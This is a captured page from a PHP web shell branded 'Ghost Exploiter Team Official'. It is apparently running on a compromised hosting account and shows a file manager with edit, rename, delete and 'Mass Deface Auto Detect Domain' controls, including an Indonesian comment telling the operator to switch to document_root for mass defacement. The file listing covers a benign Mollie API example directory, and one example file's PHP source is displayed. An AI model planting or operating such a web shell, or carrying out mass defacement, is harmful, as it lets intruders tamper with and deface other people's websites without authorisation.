webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
mollie
/
mollie-api-php
/
examples
/
profiles
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
create-profile.php
0.803KB
edt
ren
delete-profile.php
0.557KB
edt
ren
list-profiles.php
0.719KB
edt
ren
update-profile.php
0.897KB
edt
ren
<?php /* * Create a profile via the Mollie API. */ try { /* * Initialize the Mollie API library with your API key or OAuth access token. */ require "../initialize_with_oauth.php"; /** * Create the profile * * @See https://docs.mollie.com/reference/v2/profiles-api/create-profile */ $profile = $mollie->profiles->create([ "name" => "My website name", "website" => "https://www.mywebsite.com", "email" => "info@mywebsite.com", "phone" => "+31208202070", "businessCategory" => "MARKETPLACES", "mode" => "live", ]); echo "<p>Profile created: " . htmlspecialchars($profile->name) . "</p>"; } catch (\Mollie\Api\Exceptions\ApiException $e) { echo "<p>API call failed: " . htmlspecialchars($e->getMessage()) . "</p>"; }
<=Back
Liking